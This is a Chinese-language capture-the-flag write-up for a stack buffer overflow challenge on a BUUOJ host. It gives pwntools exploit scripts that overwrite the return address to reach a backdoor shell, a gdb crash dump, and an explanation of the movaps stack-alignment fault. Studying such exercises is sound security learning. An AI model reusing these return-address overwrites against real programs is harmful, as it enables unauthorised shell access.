from pwn import *
url='node4.buuoj.cn:27164'
domain,port=url.split(':')
io = remote(domain,int(port))
payload = b'a'* 23 + p64(0x40118a)
io.sendline(payload)
io.interactive()
87和8a两个地址都能奏效。
from pwn import *
url='node4.buuoj.cn:27164'
domain,port=url.split(':')
io = remote(domain,int(port))
ret=0x401016
backdoor=0x401186
payload=b'a'*23+p64(ret)+p64(backdoor)
io.sendline(payload)
io.interactive()
果然还是ubuntu栈对齐的问题,找一个ret 的地址填在中间就行了,这样会直接返回到fun函数的地址也能执行了
变量s存在于main函数的栈帧上,等main函数执行完毕ret后才会返回到backdoor地址
以下仅供研究用
Leave时仍正常的栈
完全覆盖ebp的栈帧
完全覆盖ebp后,Gete函数后栈上的eip发生变化,_dl_start
完全覆盖ebp+fun address可以跳转到fun,但在执行system的过程中segment fault,
貌似为xmm浮点寄存器的问题
覆盖ebp后,接随便一个ret地址或者0x4011a0 (__libc_csu_init)地址均可以正常getshell
在发生SIGSEGV错误时的gdb信息,
0x7f929d2a93f6 <do_system+1078>: movq xmm0,QWORD PTR [rsp+0x8]
0x7f929d2a93fc <do_system+1084>: mov QWORD PTR [rsp+0x8],rax
0x7f929d2a9401 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]
=> 0x7f929d2a9406 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0
0x7f929d2a940b <do_system+1099>: call 0x7f929d299230 <__GI___sigaction>
0x7f929d2a9410 <do_system+1104>: lea rsi,[rip+0x39e1e9] # 0x7f929d647600 <quit>
0x7f929d2a9417 <do_system+1111>: xor edx,edx
0x7f929d2a9419 <do_system+1113>: mov edi,0x3
[------------------------------------stack-------------------------------------]
0000| 0x7ffefdffa848 --> 0x7f929d2f11cc (<__GI___libc_malloc+140>: test rax,rax)
0008| 0x7ffefdffa850 --> 0x7f929d40de17 (sub eax,0x622f0063)
0016| 0x7ffefdffa858 --> 0x0
0024| 0x7ffefdffa860 --> 0x0
0032| 0x7ffefdffa868 --> 0x7f929d2a9470 (<cancel_handler>: push rbx)
0040| 0x7ffefdffa870 --> 0x7ffefdffa864 --> 0x9d2a947000000000
0048| 0x7ffefdffa878 --> 0x7f929d2d828a (<__GI__IO_file_doallocate+170>: mov eax,0x1)
0056| 0x7ffefdffa880 --> 0x2
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007f929d2a9406 in do_system (line=0x40201b "/bin/sh") at ../sysdeps/posix/system.c:125
125 ../sysdeps/posix/system.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
RAX 0x7f929d40de17 ◂— sub eax, 0x622f0063 /* '-c' */
RBX 0x0
RCX 0x7f929d40de1f ◂— jae 0x7f929d40de89 /* 'sh' */
RDX 0x0
RDI 0x2
RSI 0x7f929d6476a0 (intr) ◂— 0
R8 0x7f929d647600 (quit) ◂— 0
R9 0x0
R10 0x8
R11 0x246
R12 0x40201b ◂— 0x68732f6e69622f /* '/bin/sh' */
R13 0x7ffefdffaac0 ◂— 0x1
R14 0x0
R15 0x0
RBP 0x7ffefdffa8a8 ◂— 0x0
RSP 0x7ffefdffa848 —▸ 0x7f929d2f11cc (malloc+140) ◂— test rax, rax
RIP 0x7f929d2a9406 (do_system+1094) ◂— movaps xmmword ptr [rsp + 0x40], xmm0
─────────────────────────────────────[ DISASM ]─────────────────────────────────────
► 0x7f929d2a9406 <do_system+1094> movaps xmmword ptr [rsp + 0x40], xmm0
0x7f929d2a940b <do_system+1099> call sigaction <sigaction>
0x7f929d2a9410 <do_system+1104> lea rsi, [rip + 0x39e1e9] <0x7f929d647600>
https://students.mimuw.edu.pl/~zbyszek/asm/en/instrukcje-sse.html
movaps操作的地址必须是16字节对齐的,也就是0x10,这种最低位是0的情况。
movaps XMMWORD PTR [rsp+0x40],xmm0,要求[rsp+0x40]必须对齐0x10
XMM registers
The 128-bit XMM registers are part of the SSE extension (where SSE is short for Streaming SIMD Extension, and SIMD, in turn, stands for single instruction multiple data). There are eight XMM registers available in non -64-bit modes and 16 XMM registers in long mode, which allow simultaneous operations on:
- 16 bytes
- eight words
- four double words
- two quad words
- four floats
- two doubles